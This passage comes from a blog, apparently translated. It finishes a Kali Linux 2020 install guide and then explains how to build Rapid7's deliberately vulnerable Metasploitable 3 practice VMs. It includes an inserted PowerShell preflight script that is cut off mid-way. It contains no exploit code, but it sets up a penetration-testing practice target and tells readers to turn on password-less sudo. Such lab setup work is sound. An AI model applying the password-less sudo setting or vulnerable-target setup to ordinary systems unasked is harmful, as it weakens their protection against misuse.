<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjamOy8xc6AnSAvblzY6Bru4eOSVy9uNf2FebRt5H3ZXZyw3gWZg_4rRFP-mnVYB5dVqa4pDUTEtJJyagZnI03Rpx20Q9CGm8KX-oLYgJcvJTnUN2xAOqYX4cAJLpgcq3iopVPE2pRy8Pf9/s1600/kali-2020_18.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="806" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjamOy8xc6AnSAvblzY6Bru4eOSVy9uNf2FebRt5H3ZXZyw3gWZg_4rRFP-mnVYB5dVqa4pDUTEtJJyagZnI03Rpx20Q9CGm8KX-oLYgJcvJTnUN2xAOqYX4cAJLpgcq3iopVPE2pRy8Pf9/s400/kali-2020_18.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 18: The user chooses which software to install</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
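<b>19. The default desktop environment is Xfce; if you prefer GNOME, you can add it here.</b></div>
<div style="margin-left: 2em;">
As for the other tools, if you are not sure what to choose, just tick them all! Or keep the default (default installs the tools used in Live mode). Since I am a greedy user, I ticked every option under <span style="color: #990000;"><b>Install tools by purpose</b></span> (Figure 19) so that I would not have to install them one by one later. After pressing "Continue", package installation starts, and it takes quite a while.<br />
During installation the display manager configuration shown in <b>Figure 20</b> appears. I selected GNOME, so I had to set the default display manager; if you did not choose to install GNOME, this screen probably will not appear?</div>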
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCO1Wqi1wwO-mKdZt3OeAIkdxh87PJMz6VfNsA6hQidJNPEEB0sFBnm2wGnLj1EV-TQtc4EBDn2GPt_1eDaFV1ZEAVLb2dtHpSyAuKjWq3Ez-RDr3GBQwM3AO13CpC9XDl6hVBOfUwIJfs/s1600/kali-2020_19.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="607" data-original-width="806" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCO1Wqi1wwO-mKdZt3OeAIkdxh87PJMz6VfNsA6hQidJNPEEB0sFBnm2wGnLj1EV-TQtc4EBDn2GPt_1eDaFV1ZEAVLb2dtHpSyAuKjWq3Ez-RDr3GBQwM3AO13CpC9XDl6hVBOfUwIJfs/s400/kali-2020_19.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 19: I ticked every item under Install tools by purpose (except Reporting)</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_vwbPAgJ9o6WwSFhKiw5Te95umAUohcVvlrtTgs72pMSq30ia-SiXV7CCvaly9O4qxsT6wGbYPpsTRaPGLJlTbEdBOj1SGGlQZJMtFIShuVWRgSMQUvBQ1bnLIN5CBfNbIlJKFZmnW5z/s1600/kali-2020_20.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="807" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_vwbPAgJ9o6WwSFhKiw5Te95umAUohcVvlrtTgs72pMSq30ia-SiXV7CCvaly9O4qxsT6wGbYPpsTRaPGLJlTbEdBOj1SGGlQZJMtFIShuVWRgSMQUvBQ1bnLIN5CBfNbIlJKFZmnW5z/s400/kali-2020_20.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 20: Configuring gdm because the GNOME desktop was also installed</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>20. Almost done. Next is the boot loader (GRUB) setup; choose "Yes" to install GRUB to the master boot record (MBR) (Figure 21).</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgspvmQXcpE2IxXEkevVy2L1QY6UOkBeFHmoPplz4a9bEHvaZwr35vhnKSZ4v49FDUf_6SxGYWTeXze7YCrSNB0IMqrOrPDNoV8xgzBDzKUFWRp5cHx31dGwZZ2IXdHhU-3EA4OYW9tpDST/s1600/kali-2020_21.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="811" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgspvmQXcpE2IxXEkevVy2L1QY6UOkBeFHmoPplz4a9bEHvaZwr35vhnKSZ4v49FDUf_6SxGYWTeXze7YCrSNB0IMqrOrPDNoV8xgzBDzKUFWRp5cHx31dGwZZ2IXdHhU-3EA4OYW9tpDST/s400/kali-2020_21.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 21: Installing GRUB to the master boot record</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
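<b>21. On the next screen, since there is only one disk, select "/dev/sda" and press "Continue" (Figure 22). Wait a little longer and the installation is complete! (Figure 23)</b></div>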
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifyQB7Ml_7FWlW4mH3qdSORzAgSSL0QjEDGEM4s4K_PaDaz_oVVVIyUbqp2SAn2u9TDtHBPXneFn4Om3y-gckosfFk0hms5y9Rit_DjqFOHrNHEkPfRynTrnZGUsNqjLF5BiVW-DlPfHUG/s1600/kali-2020_22.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="806" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifyQB7Ml_7FWlW4mH3qdSORzAgSSL0QjEDGEM4s4K_PaDaz_oVVVIyUbqp2SAn2u9TDtHBPXneFn4Om3y-gckosfFk0hms5y9Rit_DjqFOHrNHEkPfRynTrnZGUsNqjLF5BiVW-DlPfHUG/s400/kali-2020_22.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 22: Selecting the bootable disk on which to install GRUB</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUD3oym8BsYiCS4NYTrjg9O5ZORJONWjzF8tWBBW_vgVuiJEHRetTV2_XOgMOiRTDkG8UTQxSQDooIGgqCmA5HNhOmriu283UhpqEJdot12NDbRSFOjU67bx00Wc7K8FIz8BtC99oXyN1Q/s1600/kali-2020_23.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="807" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUD3oym8BsYiCS4NYTrjg9O5ZORJONWjzF8tWBBW_vgVuiJEHRetTV2_XOgMOiRTDkG8UTQxSQDooIGgqCmA5HNhOmriu283UhpqEJdot12NDbRSFOjU67bx00Wc7K8FIz8BtC99oXyN1Q/s400/kali-2020_23.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 23: System installation finally complete</td></tr>
</tbody></table>
<div style="margin: 0.5em 0 0 0;">
<span style="color: #0c343d; font-size: large;"><b>Login
</b></span></div>
<div style="margin-left: 2em;">
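The user name (Kea Leave) was set during installation. At login you can select this account (Figure 24) and enter the password (Figure 25). To switch the X Window environment, first click the gear to the left of the "Log In" button (Figure 26), choose the desktop environment, and then log in.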
</div>
<div cellpadding="0" cellspacing="0" center="" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL5ZZQlbC7iYRX4jwI9clPTkaK-CQHE2xc9a75DDOxJjQApAonYE1Nb4e7MFzJGzdvh9vxJ0ZXWRrEHT9r96AvYfXWCFv0PR9TxQEhyphenhyphenZtUZhKco1vals6JooOQmfhFxLI163dIe6VuPPW0/s1600/kali-2020_24.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="528" data-original-width="574" height="367" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL5ZZQlbC7iYRX4jwI9clPTkaK-CQHE2xc9a75DDOxJjQApAonYE1Nb4e7MFzJGzdvh9vxJ0ZXWRrEHT9r96AvYfXWCFv0PR9TxQEhyphenhyphenZtUZhKco1vals6JooOQmfhFxLI163dIe6VuPPW0/s400/kali-2020_24.PNG" width="400" /></a><br />
Figure 24: Selecting the user to log in as</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXlqaHdG4kgIHAqvsfNphCaEKfiNk5N_Ujdwgzp9NUOuaESsCcO1kSRjuPleq81QD0joz86Q8hpmNaxcvFIUy7JU3SUhmOH2AvYNEpBLg2UFVDJjuBpU_AoZB9JHhRi0bqef9O6OeMW0P3/s1600/kali-2020_25.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="482" data-original-width="474" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXlqaHdG4kgIHAqvsfNphCaEKfiNk5N_Ujdwgzp9NUOuaESsCcO1kSRjuPleq81QD0joz86Q8hpmNaxcvFIUy7JU3SUhmOH2AvYNEpBLg2UFVDJjuBpU_AoZB9JHhRi0bqef9O6OeMW0P3/s400/kali-2020_25.PNG" width="392" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 25: Entering the user's password</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeZKaMDMut3yuMyFtZUPSl52os9UpYc0xUfLDDEPak7J3exb_xy2Kn2w9f_NwEktmZavAbEer9EFS90LZVWPiCFRzw8jCBCZSSDghK6H4CAgR6khrQv3HzDnHI1Dpa8CDg2Uv-UBbg2fG8/s1600/kali-2020_26.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="463" data-original-width="559" height="331" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeZKaMDMut3yuMyFtZUPSl52os9UpYc0xUfLDDEPak7J3exb_xy2Kn2w9f_NwEktmZavAbEer9EFS90LZVWPiCFRzw8jCBCZSSDghK6H4CAgR6khrQv3HzDnHI1Dpa8CDg2Uv-UBbg2fG8/s400/kali-2020_26.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 26: Or choose the desktop environment first, then log in</td></tr>
</tbody></table>
<br />
<div>
<b>Figure 27A shows the GNOME interface and Figure 27B, to its right, the Xfce interface, for comparison.</b></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi2-tbnt03fdAifcnVD9cCAOGVEzMTwyPQcb8hu_BJdFQ7NnZsSZAeX4jtPzIoFWHVLcmxFAIo4k_H-36N5rFp_yTa2AnCZnNkz0f_L_-gM0VlOkZGCZ_y3QQVHrd3jHAaK_T-L0Ui5ifB/s1600/kali-2020_27A.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="618" data-original-width="1293" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi2-tbnt03fdAifcnVD9cCAOGVEzMTwyPQcb8hu_BJdFQ7NnZsSZAeX4jtPzIoFWHVLcmxFAIo4k_H-36N5rFp_yTa2AnCZnNkz0f_L_-gM0VlOkZGCZ_y3QQVHrd3jHAaK_T-L0Ui5ifB/s320/kali-2020_27A.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 27A: GNOME desktop</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgamK5_VA48BU9TKY51MMKKFyXa6r-rQEMbIQqqcavQBl4hvB6gn_y6fqDcXjK3lPiDMh6YNhdxDtKC070b7LtkMABfTVH6JSuvr7UpSrN4OvFedF05PXf9UqW8GVMhp8yg7cJnCN5Gm8pt/s1600/kali-2020_27B.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="704" data-original-width="1233" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgamK5_VA48BU9TKY51MMKKFyXa6r-rQEMbIQqqcavQBl4hvB6gn_y6fqDcXjK3lPiDMh6YNhdxDtKC070b7LtkMABfTVH6JSuvr7UpSrN4OvFedF05PXf9UqW8GVMhp8yg7cJnCN5Gm8pt/s320/kali-2020_27B.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 27B: Xfce desktop</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin: 0.5em 0 0 0;">
<br />
<span style="font-size: large;"><span style="color: #660000;"><b>Not sure whose bug this is
</b></span></span></div>
<div style="margin-left: 2em;">
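Running kali-undercover in Xfce switches the interface to the Windows 10 imitation mode (Figure 28). If you do not run kali-undercover again to switch back to Linux mode, then the next time you boot into GNOME the terminal prompt still shows "C:\home\kali>" (Figure 29).</div>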
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHe4YidxO_VG0BTk7arLh_DpgBA7M-pyLOKynnZGa2dwgCOj6zXXb9GQEgdGWqBZJ4Qpj10j4Cl6Qv_3GK5V3SLmiw84K2AihpUVFO4-LCnuOIH_bcr4_3RIq0f_dUNyRi5PluzVFT1YTz/s1600/kali-2020_28.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="734" data-original-width="1293" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHe4YidxO_VG0BTk7arLh_DpgBA7M-pyLOKynnZGa2dwgCOj6zXXb9GQEgdGWqBZJ4Qpj10j4Cl6Qv_3GK5V3SLmiw84K2AihpUVFO4-LCnuOIH_bcr4_3RIq0f_dUNyRi5PluzVFT1YTz/s400/kali-2020_28.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 28: Switched to the Windows 10 imitation desktop</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRzK85xzQZOiOyMJcW0S0jW4Sj0adomc8EFeUSqXQ3243T_HbzzaMBNqN8T611Cm4LPyT8H6jNJDSBY1xCGWMJW8pVqUITSSGPRrIoZsJLSzD1vk2ZJw5KZQxWRpVk4UXYGvkPBw9cyvJs/s1600/kali-2020_29.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="404" data-original-width="737" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRzK85xzQZOiOyMJcW0S0jW4Sj0adomc8EFeUSqXQ3243T_HbzzaMBNqN8T611Cm4LPyT8H6jNJDSBY1xCGWMJW8pVqUITSSGPRrIoZsJLSzD1vk2ZJw5KZQxWRpVk4UXYGvkPBw9cyvJs/s400/kali-2020_29.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 29: Booted into the GNOME desktop, but the prompt still shows "C:\home\kali>"</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="margin-left: 2em;">
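In Xfce's Windows 10 imitation mode, running kali-undercover restores the Kali look of the terminal prompt, but the desktop still looks like Windows 10 (Figure 30). This differs from the Kali documentation, which says that running kali-undercover again restores the previous theme.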
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGXUn0lWFJQt8_UjVo0Y3WUWwgjZwUIp9Mt_kinMPaigisZthDlmmn78a9Wap-LXkN5OgN_2lFdOH1PEPfvja7W-TmvaglwqO8c90pnaFyAklTI8Dh1zw5UeZoQ19YdhxueecFoFDeKsg5/s1600/kali-2020_30.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="737" data-original-width="792" height="371" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGXUn0lWFJQt8_UjVo0Y3WUWwgjZwUIp9Mt_kinMPaigisZthDlmmn78a9Wap-LXkN5OgN_2lFdOH1PEPfvja7W-TmvaglwqO8c90pnaFyAklTI8Dh1zw5UeZoQ19YdhxueecFoFDeKsg5/s400/kali-2020_30.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 30: The terminal has switched back to Xfce, but the desktop still looks like Windows 10 (compare with Figure 27B)</td></tr>
</tbody></table>
<div style="margin: 0.5em 0 0 0;">
<br />
<span style="color: #274e13;"><span style="font-size: large;"><b>Password-less sudo
</b></span></span></div>
<div style="margin-left: 2em;">
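From 2020.1 onward you no longer have root privileges, and privileged commands must be run with sudo. However, sudo asks you to verify your password (Figure 31). If you find that annoying, run "sudo dpkg-reconfigure kali-grant-root" and choose "Enable password-less privilege escalation" (Figure 32). You still need to type "sudo", but the system no longer asks for the password.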
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDKQiVH6JN9fwsMUAl_6_-Nyw4an8s8KUEFgODbsxcvH8ozc7E01GJA_CTvIcX4lAD57m9q1RunHE1XBDV-ODMMgF99AiMjobaF2OsWcl0FO9_xBf7lFhdR6ZSdjP44UdWJ2xZdCZLCyvi/s1600/kali-2020_31.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="479" data-original-width="661" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDKQiVH6JN9fwsMUAl_6_-Nyw4an8s8KUEFgODbsxcvH8ozc7E01GJA_CTvIcX4lAD57m9q1RunHE1XBDV-ODMMgF99AiMjobaF2OsWcl0FO9_xBf7lFhdR6ZSdjP44UdWJ2xZdCZLCyvi/s400/kali-2020_31.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 31: Running a privileged command with sudo requires confirming the password again</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF-F0KFfox7nEuSNWxoZ3lYvL6mN5_47KGFmsHLQHH1UXWY-YSD8dMWFecQ_OYxKNLutTIEy2m6V1n9B51_scvnpkjx68UCq_J4kI98LoX7GWghQCSIEqgNi07YJMS1KFidUltdb_KntI3/s1600/kali-2020_32.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="513" data-original-width="637" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF-F0KFfox7nEuSNWxoZ3lYvL6mN5_47KGFmsHLQHH1UXWY-YSD8dMWFecQ_OYxKNLutTIEy2m6V1n9B51_scvnpkjx68UCq_J4kI98LoX7GWghQCSIEqgNi07YJMS1KFidUltdb_KntI3/s400/kali-2020_32.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 32: Using dpkg-reconfigure kali-grant-root so that the password no longer has to be confirmed</td></tr>
</tbody></table>
<br />
<hr style="color: blue;" />
<div>
<b>That is all for this brief supplement; if I find anything new, I will write another post!
</b></div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com16tag:blogger.com,1999:blog-1967825056283652287.post-37242886300280122202020-01-04T05:55:00.000+08:002020-01-04T05:55:28.399+08:00How to build the Metasploitable 3 virtual machines<div style="border: #ff3399 4px solid; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="text-indent: 2em;">
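In 2016 I wrote the book 「Metasploitable|白帽駭客新兵訓練營」, which uses Metasploitable 2 as the practice target. Metasploitable 2 is distributed as a virtual machine image and is easy to deploy on VMware or VirtualBox. At the end of 2016, however, Rapid7 released Metasploitable 3, this time not as a ready-made virtual machine image but as a set of scripts with which users build it themselves. The build instructions are at: <a href="https://github.com/rapid7/metasploitable3">https://github.com/rapid7/metasploitable3</a>. I followed those instructions and still ran into one problem after another. I had expected someone to publish a packaged image after a while, but after a long search all I found were build-it-yourself tutorials, and following them I still hit obstacles everywhere. Recently I had a gap between jobs and could work through it calmly, and I found that building it yourself is actually simple, so I am recording the steps here. </div>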
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
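1. First <span style="color: #990000;"><b>confirm that the computer supports VT-x or AMD-V and that it is enabled</b></span>; otherwise the image build fails only at a late stage, which wastes a lot of time.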
</div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
2. <b><span style="color: #990000;">PowerShell version 3.0 or later</span></b>:</div>
<div style="margin-left: 2em;">
I built on Windows 7, whose built-in PowerShell only goes up to version 2.0; it must be upgraded to 3.0 before the build procedure will run.<br />
After opening PowerShell, run " <span style="color: #351c75;"><b>$psversiontable</b></span>" to check the current version. If it is below 3.0, go to<br />
<a href="https://www.microsoft.com/en-us/download/details.aspx?id=34595">https://www.microsoft.com/en-us/download/details.aspx?id=34595</a> to download and install <span style="color: #990000;">Windows6.1-KB2506143-x64.msu</span> (or <span style="color: #990000;">Windows6.1-KB2506143-x86.msu</span>).</div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
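3. With PowerShell sorted out, next <span style="color: #990000;"><b>install VirtualBox</b></span>. However, <b>the build tool vagrant currently supports VirtualBox only up to version 5.2.x</b>; if VirtualBox 6.x is installed, vagrant will not run properly. I installed VirtualBox 5.2.34 and its extension pack. After VirtualBox is installed, close the VirtualBox manager window.</div>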
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
</div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
4. <span style="color: #990000;"><b>Install vagrant</b></span></div>
<div style="margin-left: 2em;">
Download the vagrant installer (vagrant_2.2.4_x86_64.msi) from <a href="https://www.vagrantup.com/docs/installation/">https://www.vagrantup.com/docs/installation/</a>. After installation, vagrant automatically adds "install path\bin" (for example D:\HashiCorp\Vagrant\bin) to the PATH environment variable.</div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
5. <span style="color: #990000;"><b>Install Packer</b></span></div>
<div style="margin-left: 2em;">
Download packer_1.5.1_windows_amd64.zip from <a href="https://www.packer.io/intro/getting-started/install.html">https://www.packer.io/intro/getting-started/install.html</a>. The archive contains a single file, packer.exe; extract it into the bin directory under the vagrant install path, so that no separate PATH setting is needed for packer.</div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
6. Start PowerShell and run:</div>
<div style="background-color: #000066; color: yellow; line-height: 140%; padding: 4px;">
<br />
d: <span style="color: lime;"> #I work on drive D:; any other disk with enough free space (65 GB) will also do</span><br />
<pre><code>vagrant plugin install vagrant-reload <span style="color: lime;">#install the vagrant plugin</span></code></pre>
<pre><code>mkdir metasploitable3-workspace <span style="color: lime;">#create the working directory</span>
cd metasploitable3-workspace <span style="color: lime;">#change into the working directory</span>
</code></pre>
<br />
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile" -OutFile "Vagrantfile" <span style="color: lime;">#download the required configuration file</span></div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
7. Continuing from step 6, run one of the following commands to build the Metasploitable 3 virtual machine.</div>
<div style="background-color: #000066; color: yellow; line-height: 140%; padding: 4px;">
vagrant up ub1404 <span style="color: lime;">##build the Ubuntu version of Metasploitable 3</span><br />
<span style="color: lime;">## or</span><br />
vagrant up win2k8 <span style="color: lime;">##build the Windows 2008 version of Metasploitable 3</span></div>
After running vagrant up win2k8 or <b>vagrant up ub1404</b> there is a long wait; please be patient!<br />
<div style="background-color: #993333; border: #aa0000 1px solid; color: yellow; font-size: 11pt; line-height: 120%; padding: 4px;">
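<b>Note:</b><br />
vagrant up ub1404 downloads the .iso file needed for Ubuntu from the network, which takes about 2 to 3 hours<br />
vagrant up win2k8 downloads the .iso file needed for win2k8 from the network; depending on download speed, this takes about 5 to 6 hours<br />
(The actual time depends on network conditions; while building win2k8, my build was once interrupted by an unstable network)</div>
When you finally see<br />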
<div style="background-color: #000066; color: white; line-height: 140%; padding: 4px;">
ub1404: This is not an error message; everything may continue to work properly, in which case you may ignore this message.<br />
==> ub1404: Setting hostname...<br />
==> ub1404: Configuring and enabling network interfaces...
</div>
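the Ubuntu version of Metasploitable 3 has been built. At this point you will see that VirtualBox has automatically started the "Metasploitable3-ub1404" virtual machine.<br />
If you ran <b> vagrant up win2k8</b>, seeing the following messages means the Win2K8 version of Metasploitable 3 has been built:<br />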
<div style="background-color: #000066; color: white; line-height: 140%; padding: 4px;">
==> win2k8: Running provisioner: shell...<br />
win2k8: Running: inline PowerShell script<br />
win2k8: CMDKEY: Credential added successfully.<br />
win2k8: System error 67 has occurred.<br />
win2k8: The network name cannot be found.<br />
==> win2k8: Running provisioner: shell...<br />
win2k8: Running: inline PowerShell script<br />
PS D:\metasploitable3-workspace></div>
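<div style="margin-top: 1em;">
The prerequisites from steps 1 to 6 can be checked in one pass before the multi-hour <b>vagrant up</b> run. The script below is an added example, not part of the original post or of Rapid7's scripts. Its parameter and function names are hypothetical, and it assumes Windows PowerShell, the VirtualBox installer's VBOX_MSI_INSTALL_PATH environment variable, and the Win32_Processor property VirtualizationFirmwareEnabled, which only Windows 8 and later report.</div>

```powershell
# Added example: preflight for the Metasploitable 3 build (not part of rapid7's scripts).
# Thresholds are the ones given in the article. Written for Windows PowerShell 2.0-5.1
# so that it can still run, and report the problem, on a shell that is too old.
param(
    [string]$WorkDrive = 'D',   # the article works on D:; pass another letter if needed
    [int]$MinFreeGB    = 65     # free space the article says the build needs
)

$script:Results = @()

function Add-Check {
    param([string]$Name, [string]$Status, [string]$Detail)
    $script:Results += New-Object PSObject -Property @{
        Check = $Name; Status = $Status; Detail = $Detail
    }
}

function Find-Tool {
    # Full path of the first executable with that name on PATH, or $null.
    param([string]$Name)
    $cmd = Get-Command -Name $Name -CommandType Application -ErrorAction SilentlyContinue |
        Select-Object -First 1
    if ($cmd) { return $cmd.Path }
    return $null
}

# Step 1: VT-x / AMD-V. Windows 7 does not report this property (assumption noted in
# the lead-in), so a missing value is UNKNOWN rather than a failure.
$cpu = Get-WmiObject -Class Win32_Processor | Select-Object -First 1
$vt  = $cpu.VirtualizationFirmwareEnabled
if ($vt -eq $true) {
    Add-Check 'VT-x/AMD-V' 'OK' 'enabled in firmware'
} elseif ($vt -eq $false) {
    Add-Check 'VT-x/AMD-V' 'FAIL' 'reported as disabled; enable it in BIOS/UEFI'
} else {
    Add-Check 'VT-x/AMD-V' 'UNKNOWN' 'not reported by this Windows version; check BIOS/UEFI'
}

# Step 2: PowerShell 3.0 or later.
$psv = $PSVersionTable.PSVersion
if ($psv.Major -ge 3) {
    Add-Check 'PowerShell 3.0+' 'OK' "$psv"
} else {
    Add-Check 'PowerShell 3.0+' 'FAIL' "$psv; install the KB2506143 update first"
}

# Step 3: VirtualBox 5.2.x. VBoxManage.exe is often not on PATH, so also look in
# the directory the installer records in VBOX_MSI_INSTALL_PATH.
$vbox = Find-Tool 'VBoxManage.exe'
if (-not $vbox -and $env:VBOX_MSI_INSTALL_PATH) {
    $candidate = Join-Path $env:VBOX_MSI_INSTALL_PATH 'VBoxManage.exe'
    if (Test-Path $candidate) { $vbox = $candidate }
}
if ($vbox) {
    $vboxVer = & $vbox --version | Select-Object -Last 1   # e.g. 5.2.34r133893
    if ($vboxVer -match '^5\.2\.') {
        Add-Check 'VirtualBox 5.2.x' 'OK' $vboxVer
    } else {
        Add-Check 'VirtualBox 5.2.x' 'FAIL' "found $vboxVer; the article had vagrant working only up to 5.2.x"
    }
} else {
    Add-Check 'VirtualBox 5.2.x' 'FAIL' 'VBoxManage.exe not found'
}

# Steps 4 and 5: vagrant and packer must both resolve through PATH.
$vagrant = Find-Tool 'vagrant.exe'
$packer  = Find-Tool 'packer.exe'
if ($vagrant) { Add-Check 'vagrant on PATH' 'OK' $vagrant }
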